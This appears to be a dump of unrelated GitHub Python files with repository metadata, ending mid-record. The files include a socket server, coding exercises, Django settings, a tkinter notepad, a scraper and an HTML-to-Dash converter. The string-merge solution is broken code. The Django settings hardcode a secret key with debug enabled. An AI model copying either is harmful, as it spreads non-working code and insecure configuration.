global sock\n \"\"\" Close the server socket. 
\"\"\"\n print('Closing server socket (host {}, port {})'.format(self.host, self.port))\n if sock:\n sock.close()\n sock = None\n\n def sendSocketMessage(self, message):\n global sock\n global haveSocketOpened\n global client_sock\n # print('Send Socket message : ')\n try:\n if haveSocketOpened:\n client_sock.send(message.encode())\n except:\n writeLogFileError(\"Socket server - error while sending messages\")\n print(\"Error sending Socket message\")\n\n def run_server(self):\n global sock\n global client_sock\n global haveSocketOpened\n \"\"\" Accept and handle an incoming connection. \"\"\"\n print('Starting socket server (host {}, port {})'.format(self.host, self.port))\n client_sock, client_addr = sock.accept()\n print('Client {} connected'.format(client_addr))\n haveSocketOpened = True\n stop = False\n while not stop and self._running:\n if client_sock:\n # Check if the client is still connected and if data is available:\n try:\n rdy_read, rdy_write, sock_err = select.select([client_sock, ], [], [])\n except select.error:\n print('Select() failed on socket with {}'.format(client_addr))\n writeLogFileError(\"Socket server - Select() failed on socket with {}\")\n return 1\n if len(rdy_read) > 0:\n try:\n #finalMessageContent = \"\"\n #read_data = client_sock.recv(255)\n #while read_data[len(read_data)-1] != '_':\n #for x in range(0, 10):\n # finalMessageContent += str(read_data)\n # read_data = client_sock.recv(255)\n # print(\"Get one package of message:\" + str(finalMessageContent))\n\n read_data = client_sock.recv(4000)\n finalMessageContent = read_data\n\n # Check if socket has been closed\n if len(finalMessageContent) == 0:\n print('{} closed the socket.'.format(client_addr))\n stop = True\n haveSocketOpened = False\n else:\n #print('>>> Received: {}'.format(finalMessageContent.rstrip()))\n if finalMessageContent.rstrip() == 'quit':\n stop = True\n haveSocketOpened = False\n else:\n ### client_sock.send(read_data) ### Test with loop back\n #print(\"Parse this : \" + str(finalMessageContent[2:].decode(\"utf-8\")))\n try:\n json_content = json.loads(str(finalMessageContent[2:].decode(\"utf-8\")))\n print(\"Json - message type: \" + str(json_content[\"type\"]))\n if(str(json_content[\"type\"]) == \"MOVEMENTCONTROL\"):\n self.json_parser_tool.parse_movement_control_message(json_content)\n print(\"Send back OK message to the socket server\")\n #self.sendSocketMessage(\"Moveing control message - OK\\r\\n\")\n self.sendSocketMessage(\"{\\\"optional\\\": \\\"NaN\\\", \\\"state\\\": \\\"OK\\\", \\\"type\\\": \\\"MOVEMENTCONTROL\\\"}\\r\\n\")\n else:\n if(str(json_content[\"type\"]) == \"STATECONTROL\"):\n self.json_parser_tool.parse_state_control_message(json_content)\n #self.sendSocketMessage(\"State control message - OK\\r\\n\")\n self.sendSocketMessage(\"{\\\"optional\\\": \\\"NaN\\\", \\\"state\\\": \\\"OK\\\", \\\"type\\\": \\\"STATECONTROL\\\"}\\r\\n\")\n else:\n if (str(json_content[\"type\"]) == \"STEPLIST\"):\n self.json_parser_tool.parse_steps_message(json_content)\n # self.sendSocketMessage(\"State control message - OK\\r\\n\")\n self.sendSocketMessage(\n \"{\\\"optional\\\": \\\"NaN\\\", \\\"state\\\": \\\"OK\\\", \\\"type\\\": \\\"STEPLIST\\\"}\\r\\n\")\n else:\n if (str(json_content[\"type\"]) == \"PARAMS\"):\n self.json_parser_tool.parse_params_message(json_content)\n # self.sendSocketMessage(\"State control message - OK\\r\\n\")\n self.sendSocketMessage(\n \"{\\\"optional\\\": \\\"NaN\\\", \\\"state\\\": \\\"OK\\\", \\\"type\\\": \\\"PARAMS\\\"}\\r\\n\")\n except Exception 
as f:\n print(\n 'Issue during json parsing (' + str(\n f) + \") !\")\n\n except Exception as e:\n print('Client has disconnected while reading from the socket, go back to listening (' + str(e)+ \") !\")\n stop = True\n haveSocketOpened = False\n else:\n print(\"No client is connected, SocketServer can't receive data\")\n stop = True\n haveSocketOpened = False\n # Close socket\n print('Closing connection with {}'.format(client_addr))\n client_sock.close()\n haveSocketOpened = True\n return 0","repo_name":"tothandrasbme/dummyprojectcode","sub_path":"jsonsocketservice.py","file_name":"jsonsocketservice.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20590676059","text":"# Input: word1 = \"abc\", word2 = \"pqr\"\n# Output: \"apbqcr\"\n# Explanation: The merged string will be merged as so:\n# word1: a b c\n# word2: p q r\n# merged: a p b q c r\n\nclass Solution:\n def mergeAlternately(self, word1: str, word2: str) -> str:\n res = ''\n for i in range(max(word1, word2)):\n if i < len(word1):\n res.append(word1[i])\n if i < len(word2):\n res.append(word2[i])\n\n return res\n","repo_name":"sujijava/leet_coding_w_python","sub_path":"archives/Top Interview 75/1768. Merge Strings Alternately.py","file_name":"1768. Merge Strings Alternately.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17250279877","text":"n,x = list(map(int,input().split()))\r\nlist1 = []\r\nfor i in range(n):\r\n y = int(input(\"enter price of flower\"))\r\n list1.append(y)\r\nprint(\"number of flowers are \" + str(n) + \" and their prices are \", list1)\r\nBuyer = x\r\nprint(\"Number of buyers are :\", Buyer)\r\nres = sorted(list1, reverse=True)\r\nprint(res)\r\ndef TotalPrice(res):\r\n count = 0\r\n price = 0\r\n k = 1\r\n for i in res:\r\n count += 1\r\n price = price + k*i\r\n if count == Buyer:\r\n k += 1\r\n return price\r\nprint(TotalPrice(res))\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Aakaaaassh/Coding","sub_path":"Greedy_florist.py","file_name":"Greedy_florist.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72590190873","text":"\"\"\"\nDjango settings for asm project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\ndef get_env_variable(var_name):\n \"\"\" Get the environment variable or return exception \"\"\"\n try:\n return os.environ[var_name]\n except KeyError:\n error_msg = 'Set the %s environment variable' % var_name\n raise ImproperlyConfigured(error_msg)\n\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nBASE_URL = '/'\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'st42b$-xzcuoi2%&fs%^v%nzkmjo!h6zgd1g6c5(42)+3gj^2z'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = [\n 'localhost',\n '52.1.4.157',\n '.52.1.4.157',\n '.52.1.4.157.',\n]\n\nADMINS = (\n ('Samuel Magondu', 
'MagonduNjenga@gmail.com'), \n)\n\nMANAGERS = ADMINS\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'django.contrib.sitemaps',\n 'siteAdmin',\n 'photo',\n 'wagtail',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'toolbox.urls'\n\nWSGI_APPLICATION = 'toolbox.wsgi.application'\n\nSITE_ID = 1\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n #Set this as env variables to avoid hardcoding\n 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'. \n 'NAME': get_env_variable('DB_NAME'),\n 'USER': get_env_variable('DB_USER'),\n 'PASSWORD': get_env_variable('DB_PASSWORD'),\n 'HOST': get_env_variable('DB_HOST'),\n 'PORT': get_env_variable('DB_PORT')\n }\n}\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-uk'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nSTATIC_URL = '/static/'\n\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = 'media/'\n\nLOGIN_URL = BASE_URL + 'accounts/login'\nLOGIN_REDIRECT_URL = BASE_URL\n\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, 'html'),\n '/opt/projects/engine/lib/python2.7/site-packages/django/contrib/admin/templates/admin',\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\". \n # Always use forward slashes, even on Windows. \n # Don't forget to use absolute paths, not relative paths. 
\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\n","repo_name":"itsMagondu/ASM","sub_path":"toolbox/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71515300632","text":"import os\nimport glob\n\n\nimg_root = 'datasets/ICPR/ICPR_train/image'\ntxt_root = 'datasets/ICPR/ICPR_train/txt'\n\nimgs = glob.glob(os.path.join(img_root, '*.jpg'))\n\n\na = []\nfor im in imgs:\n f = os.path.splitext(os.path.basename(im))[0] + '.txt'\n t = os.path.join(txt_root, f)\n if os.path.exists(t):\n one = '{} {}\\n'.format(im, t)\n a.append(one)\n\nwith open('datasets/icpr_train.txt', 'w') as f:\n f.writelines(a)\n\nprint('done.')","repo_name":"gentlebreeze1/dbnet-tensorrt","sub_path":"datasets/gen_icpr_train.py","file_name":"gen_icpr_train.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6819759059","text":"from tkinter import *\nfrom tkinter import filedialog as fd\n\n\ndef extract_text():\n file_name = fd.asksaveasfilename(\n filetypes=((\"TXT files\", \"*.txt\"),\n (\"HTML files\", \"*.html;*.htm\"),\n (\"All files\", \"*.*\")))\n f = open(file_name, 'w')\n s = text.get(1.0, END)\n f.write(s)\n f.close()\n\ndef insert_text():\n file_name = fd.askopenfilename()\n f = open(file_name)\n s = f.read()\n text.insert(1.0, s)\n f.close()\n\ndef child_window():\n win = Toplevel(root)\n x_entry = Entry(win)\n x_entry.pack()\n y_entry = Entry(win)\n y_entry.pack()\n\n\n def set_child_window():\n new_x = x_entry.get()\n new_y = y_entry.get()\n root.geometry(new_x + 'x' + new_y)\n\n Button(win, text = 'Ok', command = set_child_window).pack()\n\nroot = Tk()\nmainmenu = Menu(root)\nroot.config(menu = mainmenu)\nroot.title('блокнот')\n\nfilemenu = Menu(mainmenu, tearoff = 0)\nfilemenu.add_command(label = 'Сохранить', command = extract_text)\nfilemenu.add_command(label = 'Открыть', command = insert_text)\n\n\ntext = Text()\ntext.pack()\n\nmainmenu.add_cascade(label = 'Файл', menu = filemenu)\nmainmenu.add_command(label = 'Настройки', command = child_window)\n\n\nroot.mainloop()","repo_name":"clock76/knuiuiuhiuh","sub_path":"note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25107403944","text":"import multiprocessing\nfrom multiprocessing import Pool\nfrom margaritashotgun import remote_host\nfrom margaritashotgun import logger\nimport logging\n\n\nclass Workers():\n \"\"\"\n \"\"\"\n cpu_count = None\n worker_count = None\n progress_bar = True\n hosts = None\n\n def __init__(self, conf, workers, name, library=True):\n \"\"\"\n \"\"\"\n self.name = name\n self.library = library\n self.progressbar = True\n self.cpu_count = multiprocessing.cpu_count()\n host_count = len(conf)\n self.worker_count = self.count(workers, self.cpu_count, host_count)\n self.queue = multiprocessing.Queue(-1)\n\n try:\n log_dir = conf[0]['logging']['dir']\n if log_dir[-1:] != '/':\n log_dir = 
log_dir + '/'\n except TypeError:\n log_dir = \"\"\n try:\n log_prefix = conf[0]['logging']['prefix'] + \"-\"\n except TypeError:\n log_prefix = \"\"\n\n self.log_file = \"{}{}memory-capture.log\".format(\n log_dir, log_prefix)\n\n if self.worker_count > 1 or self.library is True:\n self.progressbar = False\n self.conf = []\n for c in conf:\n c['host']['progressbar'] = self.progressbar\n self.conf.append(c)\n\n def count(self, workers, cpu_count, host_count):\n \"\"\"\n \"\"\"\n if workers == 'auto':\n if cpu_count > host_count:\n worker_count = host_count\n else:\n worker_count = cpu_count\n elif workers > host_count:\n worker_count = host_count\n else:\n worker_count = int(workers)\n return worker_count\n\n def spawn(self, desc, timeout=1800):\n \"\"\"\n \"\"\"\n self.pool = Pool(self.worker_count, initializer=remote_host._init,\n initargs=(self.queue,))\n\n self.listener = logger.Logger(target=logger.listener,\n args=(self.queue,\n self.name,\n self.log_file,\n desc))\n self.listener.start()\n res = self.pool.map_async(remote_host.process, self.conf)\n results = res.get(timeout)\n\n self.cleanup()\n return results\n\n def cleanup(self, terminate=False):\n if terminate:\n self.pool.terminate()\n else:\n self.pool.close()\n self.pool.join()\n self.queue.put_nowait(None)\n self.queue.close()\n self.listener.join()\n","repo_name":"ThreatResponse/margaritashotgun","sub_path":"margaritashotgun/workers.py","file_name":"workers.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":231,"dataset":"github-code","pt":"5"} +{"seq_id":"71029499032","text":"import requests\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nimport openpyxl # import to excel\r\nfrom tabulate import tabulate # format\r\n\r\nurl = \"https://rozgrywki.pzkosz.pl/liga/4/statystyki.html\"\r\nr = requests.get(url)\r\n\r\nsoup = BeautifulSoup(r.text, \"html.parser\")\r\nif \"Łapiński\" in r.text:\r\n print(\"JEEEEST\")\r\n\r\ntable = soup.find(\"table\", class_=\"stattype splitTable\").find(\r\n 'tbody').find_all('tr')\r\n\r\n#print(table)\r\ntable_data = []\r\n\r\nfor row in table:\r\n dic = {}\r\n\r\n row_data = row.find_all('td')\r\n dic['place'] = row_data[0].text\r\n dic['player'] = row_data[1].text\r\n dic['team'] = row_data[2].text\r\n dic['matches'] = row_data[3].text\r\n dic['points_sum'] = row_data[4].text\r\n dic['points_avg'] = row_data[5].text\r\n\r\n table_data.append(dic)\r\n\r\n#print(table_data)\r\n# for key, value in dic.items():\r\n# table.append([key, value])\r\n\r\nheaders = table_data[0].keys()\r\nprint(tabulate(table_data, headers=\"keys\"))\r\n\r\n\r\n# , tablefmt=\"grid\"\r\n\r\ndf = pd.DataFrame(table_data)\r\ndf.to_excel('teams_data.xlsx', index=False)\r\ndf.to_csv('teams_data.csv', index=False)\r\n","repo_name":"zosialaa/pzkosz","sub_path":"ApiPzkosz.py/statictics.py","file_name":"statictics.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"31828643331","text":"import sys\nimport uuid\nimport xml.etree.ElementTree as xml\nimport os\nimport re\nfrom datetime import datetime\n\nfrom lastitemiterator import lii\nfrom pathlib import Path\nfrom stringbuilder import StringBuilder\nimport hashlib\nimport json\n\nVERSION = '0.3.5'\nBUF_SIZE = 65536\nATTRIBUTE_TRANSLATIONS = {'class': 'className'}\nTYPE_CONVERSIONS = {'str': str, 'int': int, 'float': float, 'bool': bool}\nCONFIG_TYPE_GETTER = {'str': 'get', 'int': 'getint', 'float': 'getfloat', 
'bool': 'getboolean'}\nLIB_CALLS = {'date': 'date', 'time': 'time', 'timedelta': 'timedelta', 'datetime': 'datetime', 'pd': 'pd', 'px': 'px',\n 'req': 'req', 'json': 'jp', 'format': 'fmt', 'io': 'io'}\n\n\nclass Html2Dash:\n\n def __init__(self, config, directory, use_pages):\n self.config = config\n self.directory = directory\n self.use_pages = use_pages\n page_file_path = Path(directory, \"pages.json\")\n if os.path.exists(page_file_path):\n with open(page_file_path, \"r\") as f:\n self.pages = json.load(f)\n else:\n self.pages = {}\n\n def save_page_file(self):\n with open(Path(self.directory, \"pages.json\"), \"w\") as f:\n json.dump(self.pages, f)\n\n def hash(self, file_stream):\n sha256 = hashlib.sha256()\n while True:\n data = file_stream.read(BUF_SIZE)\n if not data:\n break\n sha256.update(data)\n\n file_stream.seek(0)\n return sha256.hexdigest()\n\n def convert(self, path, page_name=None):\n with open(path, \"rb\") as html:\n html_hash = self.hash(html)\n name = Path(path).stem.replace(\" \", \"_\")\n out_name = f\"./{self.directory}/html2dash_generated_{name}.py\"\n tree = xml.parse(html)\n root = tree.getroot()\n includes = self.find_includes(root, Path(path).parent)\n page_obj = self.pages.get(name, None)\n if page_obj is not None and page_obj[\"hash\"] == html_hash and\\\n all([include[1][\"hash\"] == page_obj[\"includes\"].get(include[0], None) for include in includes.items()]) and\\\n page_obj[\"html2dash_version\"] == VERSION and\\\n os.path.exists(out_name):\n return\n elif page_obj is None:\n page_obj = {}\n self.pages[name] = page_obj\n\n page_obj[\"hash\"] = html_hash\n page_obj[\"generated\"] = datetime.utcnow().isoformat()\n page_obj[\"includes\"] = {str(include): includes[include][\"hash\"] for include in includes}\n page_obj[\"html2dash_version\"] = VERSION\n old_file = page_obj.get(\"generated_file\", None)\n if old_file is not None and os.path.exists(out_name):\n os.remove(old_file)\n\n self.handle_includes(root, includes, Path(path).parent)\n self.reformat_ids(root, name)\n layout_builder = StringBuilder()\n self.generate_layout_code(root, layout_builder)\n transform_builder = StringBuilder()\n self.generate_transforms(root, transform_builder)\n update_builder = StringBuilder()\n self.generate_update_code_new(root, update_builder, self.use_pages)\n with open(f\"./templates/{'paged_' if self.use_pages else ''}template.pyt\", \"r\") as template:\n template = template.read().format(\n page=(page_name or \"/\" + re.sub(r'(? 0:\n builder.append(\", \")\n\n self.generate_parameter_list(node, builder, suppress_linebreak=True)\n builder.append(\"]\")\n\n def generate_transform(self, node, builder):\n name = node.get(\"method_name\")\n data = node.find(\"{pd}transform.data\")\n if data is None:\n return None\n\n builder.append(f\"{name}(\")\n self.generate_function_call(data[0], builder)\n builder.append(\")\")\n\n def generate_lib_call(self, node, builder, lib_prefix=None):\n match = re.match(\"^(?:{(.*)})?(.*)$\", node.tag)\n namespace = match.group(1)\n tag = match.group(2)\n suppress_new = node.get(\"__suppress_new__\")\n if suppress_new is None:\n suppress_new = \"False\"\n\n if tag == 'new' and suppress_new == \"False\":\n tag = None\n\n if lib_prefix is None:\n if namespace in LIB_CALLS:\n lib_prefix = LIB_CALLS[namespace]\n else:\n return\n\n name = node.get(\"name\")\n if name is not None:\n builder.append(f\"{name}=\")\n\n builder.append(f\"{lib_prefix}{'.' 
if tag is not None else ''}{tag or ''}(\")\n attrib_childs = filter(lambda x: x.tag.startswith(f\"{node.tag}.\"), node)\n childs = filter(lambda x: not x.tag.startswith(f\"{node.tag}.\"), node)\n\n self.generate_parameter_list(childs, builder, len(node.attrib) > 0)\n for last, attrib_child in lii(attrib_childs):\n attrib_name = attrib_child.tag.replace(f\"{node.tag}.\", \"\")\n builder.append(f\"{attrib_name}=\")\n self.generate_function_call(attrib_child[0], builder)\n if not last or len(node.attrib) > 0:\n builder.append(\", \")\n\n for last, attr in lii(node.attrib):\n if attr == \"name\" or attr == \"__suppress_new__\":\n continue\n builder.append(f\"{attr}={self.format_value(node.attrib[attr])}\")\n if not last:\n builder.append(\", \")\n builder.append(\")\")\n\n def generate_dict(self, node, builder):\n param_name = node.get(\"name\")\n if param_name is not None:\n builder.append(f\"{param_name}=\")\n\n builder.append(\"dict(\")\n for last, child in lii(node):\n if len(child) > 0:\n builder.append(f\"{child.tag}={self.generate_function_call(child, builder)}, \")\n else:\n builder.append(f\"{child.tag}={self.format_value(child.text)}\")\n if not last or len(node.attrib) > (0 if param_name is None else 1):\n builder.append(\", \")\n\n for last, attrib in lii(node.attrib):\n if attrib == \"name\":\n continue\n\n builder.append(f\"{attrib}={self.format_value(node.attrib[attrib])}\")\n if not last:\n builder.append(\", \")\n\n builder.append(\")\")\n\n def generate_method(self, method, builder, from_model=True):\n method_name = method.get(\"method_name\")\n param_name = method.get(\"name\")\n if param_name is not None:\n builder.append(f\"{param_name}=\")\n\n builder.append(f\"{'model.' if from_model else ''}{method_name}(\")\n self.generate_parameter_list(method, builder)\n builder.append(\")\")\n\n def is_lib_call(self, node):\n match = re.match(\"^(?:{(.*)})?(.*)$\", node.tag)\n namespace = match.group(1)\n tag = match.group(2)\n return namespace in LIB_CALLS or namespace == \"df\"\n\n def generate_parameter_list(self, parameters, builder, trailing_comma=False, suppress_linebreak=False):\n for last, parameter in lii(parameters):\n self.generate_function_call(parameter, builder, suppress_linebreak)\n if not last or trailing_comma:\n if self.config.getboolean(\"dash2html\", \"ProduceDebuggableCode\") and self.is_lib_call(\n parameter) and not suppress_linebreak:\n builder.append_line(\", \")\n else:\n builder.append(\", \")\n\n def generate_parameter(self, parameter, builder):\n value = self.format_value(parameter.get(\"value\") or parameter.text) or parameter.get('input') or parameter.get(\n 'state')\n name = parameter.get(\"name\")\n if name is not None:\n builder.append(f\"{name}=\")\n builder.append(value)\n\n def generate_config(self, node, builder):\n key = node.get(\"key\")\n type = node.get(\"type\") or 'str'\n default = TYPE_CONVERSIONS[type](node.get(\"default\"))\n key = \", \".join(key.split(\".\"))\n builder.append(f\"config.{CONFIG_TYPE_GETTER[type]}('{key}'\")\n if default is not None:\n builder.append(f\", fallback={default}\")\n\n builder.append(\")\")\n\n def generate_update_code_new(self, node, builder, use_pages):\n parent_map = {c: p for p in node.iter() for c in p}\n node_map = {n.get(\"id\"): n for n in node.iter() if n.get(\"id\") is not None}\n outputs = node.findall(\".//dash:output\", namespaces={\"dash\": \"dash\"})\n input_map = {n.get('id'): n for n in node.findall(\".//dash:input\", namespaces={\"dash\": \"dash\"})}\n output_groups = {}\n for output in 
outputs:\n parent = parent_map[output].get(\"id\")\n if parent not in output_groups:\n output_groups[parent] = []\n\n output_groups[parent].append(output)\n\n if len(outputs) == 0 and len(input_map) == 0:\n return;\n\n for last_output, parent_id, outputs_in_parent in lii(output_groups.items()):\n input_candidates = node_map[parent_id].findall(\".//d2h:parameter[@input]\", namespaces={\"d2h\": \"d2h\"})\n inputs = []\n input_ids = []\n for input in input_candidates:\n input_node = input_map[input.get(\"input\")]\n input_component = input_node.get(\"component_property\")\n input_parent_id = parent_map[input_node].get(\"id\")\n id = f\"{input_component}:{input_parent_id}\"\n if id not in input_ids:\n inputs.append(input)\n input_ids.append(id)\n\n state_candidates = node_map[parent_id].findall(\".//d2h:parameter[@state]\", namespaces={\"d2h\": \"d2h\"})\n states = []\n state_ids = []\n for input in state_candidates:\n input_node = input_map[input.get(\"state\")]\n input_component = input_node.get(\"component_property\")\n input_parent_id = parent_map[input_node].get(\"id\")\n id = f\"{input_component}:{input_parent_id}\"\n if id not in input_ids and id not in state_ids:\n states.append(input)\n state_ids.append(id)\n\n builder.append_line(f\"@{'' if use_pages else 'app.'}callback(\")\n builder.push_indent()\n for last, output in lii(outputs_in_parent):\n builder.append(\n f'Output(component_id=\"{parent_id}\", component_property=\"{output.get(\"component_property\")}\")')\n if not last or len(inputs) > 0:\n builder.append_line(\",\")\n\n for last, input in lii(inputs):\n input_node = input_map[input.get(\"input\")]\n input_parent_id = parent_map[input_node].get(\"id\")\n builder.append(\n f'Input(component_id=\"{input_parent_id}\", component_property=\"{input_node.get(\"component_property\")}\")')\n if not last or len(states) > 0:\n builder.append_line(\",\")\n\n for last, input in lii(states):\n input_node = input_map[input.get(\"state\")]\n input_parent_id = parent_map[input_node].get(\"id\")\n builder.append(\n f'State(component_id=\"{input_parent_id}\", component_property=\"{input_node.get(\"component_property\")}\")')\n if not last:\n builder.append_line(\",\")\n\n builder.append_line(\")\")\n builder.pop_indent()\n builder.append(f\"def update_{parent_id}(\")\n for last, input in lii(inputs):\n input_node = input_map[input.get(\"input\")]\n builder.append(input_node.get(\"id\"))\n if not last or len(states) > 0:\n builder.append(\", \")\n\n for last, states in lii(states):\n input_node = input_map[states.get(\"state\")]\n builder.append(input_node.get(\"id\"))\n if not last:\n builder.append(\", \")\n\n builder.append_line(\"):\")\n builder.push_indent()\n\n for output in outputs_in_parent:\n value = output.get(\"value\")\n property = output.get(\"component_property\")\n builder.append(f\"__output_{parent_id}_{property} = \")\n\n if value is not None:\n builder.append(self.format_value(value))\n elif len(output) > 0:\n self.generate_function_call(output[0], builder, True)\n else:\n builder.append(\"None\")\n\n builder.append_line()\n\n builder.append(\"return \")\n for last, output in lii(outputs_in_parent):\n property = output.get(\"component_property\")\n builder.append(f\"__output_{parent_id}_{property}\")\n if not last:\n builder.append(\", \")\n\n builder.pop_indent()\n\n if not last_output:\n builder.append_line(builder.line_break)\n\n def generate_layout_code(self, node, builder):\n match = re.match(\"^(?:{(.*)})?(.*)$\", node.tag)\n tag = match.group(2)\n namespace = 
match.group(1) or \"html\"\n if namespace == \"html\":\n tag = tag.capitalize()\n\n builder.append(f\"{namespace}.{tag}(\")\n children = [x for x in node if not (\n x.tag.startswith(f\"{tag}.\") or x.tag.startswith(f\"{node.tag}.\") or x.tag.startswith(\n \"{d2h}\") or x.tag.startswith(\"{dash}\"))]\n nested_attributes = [x for x in node if x.tag.startswith(f\"{tag}.\") or x.tag.startswith(f\"{node.tag}.\")]\n has_args = False\n if len(children) > 0:\n builder.append_line(\"[\")\n builder.push_indent()\n for last, child in lii(children):\n self.generate_layout_code(child, builder)\n if not last:\n builder.append_line(\",\")\n builder.append_line()\n builder.pop_indent()\n builder.append(\"]\")\n has_args = True\n elif len(node) == 0:\n if node.text is not None and node.text != \"\":\n if '\\n' in node.text or '\\r' in node.text:\n builder.append_line(f'\"\"\"{node.text}\"\"\"')\n else:\n builder.append(f'\"{node.text}\"')\n has_args = True\n\n builder.push_indent()\n if len(node.attrib) > 0 and has_args:\n builder.append_line(\",\")\n\n for last_attrib, key, value in lii(node.attrib.items()):\n if key in ATTRIBUTE_TRANSLATIONS:\n key = ATTRIBUTE_TRANSLATIONS[key]\n\n if key == \"style\":\n builder.append(\"style={\")\n for last_item, item in lii(value.split(\";\")):\n key, value = item.split(\":\")\n builder.append(f'\"{key.strip()}\": \"{value.strip()}\"{\"\" if last_item else \",\"}')\n builder.append(f\"}}{'' if last_attrib else ','}\")\n else:\n builder.append(f\"{key}={self.format_value(value)}\")\n\n if not last_attrib:\n builder.append_line(\", \")\n\n if len(nested_attributes) > 0 and (has_args or len(node.attrib) > 0):\n builder.append_line(\",\")\n\n for last, child in lii(nested_attributes):\n complex = bool(child.get(\"complex\") or False)\n ctag = child.tag.split(\".\")[-1]\n if complex:\n builder.append(f\"{ctag}=\")\n self.generate_function_call(child[0], builder, False)\n else:\n builder.append(f\"{ctag}={{\")\n for last_item, item in lii(child):\n builder.append(f'\"{item.tag}\": {self.format_value(item.text.strip())}{\"\" if last_item else \",\"}')\n builder.append(\"}\")\n if not last:\n builder.append_line(\", \")\n builder.pop_indent()\n\n builder.append(\")\")\n","repo_name":"Aeolin/html2dash","sub_path":"html2dash.py","file_name":"html2dash.py","file_ext":"py","file_size_in_byte":21955,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"42290470468","text":"import cv2\nimport numpy as np\n\n\ndef ellipse_detect(image):\n \"\"\"\n :param image: 图片路径\n \"\"\"\n skinCrCbHist = np.zeros((256, 256), dtype=np.uint8)\n cv2.ellipse(skinCrCbHist, (113, 155), (23, 15),\n 43, 0, 360, (255, 255, 255), -1)\n\n YCRCB = cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)\n (y, cr, cb) = cv2.split(YCRCB)\n skin = np.zeros(cr.shape, dtype=np.uint8)\n (x, y) = cr.shape\n for i in range(0, x):\n for j in range(0, y):\n CR = YCRCB[i, j, 1]\n CB = YCRCB[i, j, 2]\n if skinCrCbHist[CR, CB] > 0:\n skin[i, j] = 255\n dst = cv2.bitwise_and(image, image, mask=skin)\n return dst\n\n\nif __name__ == '__main__':\n ellipse_detect('./data/image.jpg')\n","repo_name":"amifed/dl","sub_path":"utils/segmentation/ellipse_detect.py","file_name":"ellipse_detect.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"6665199820","text":"import logging\nfrom .request import normalize, make_request, And, Condition, Or, Not\nfrom .query import QueryFilter, 
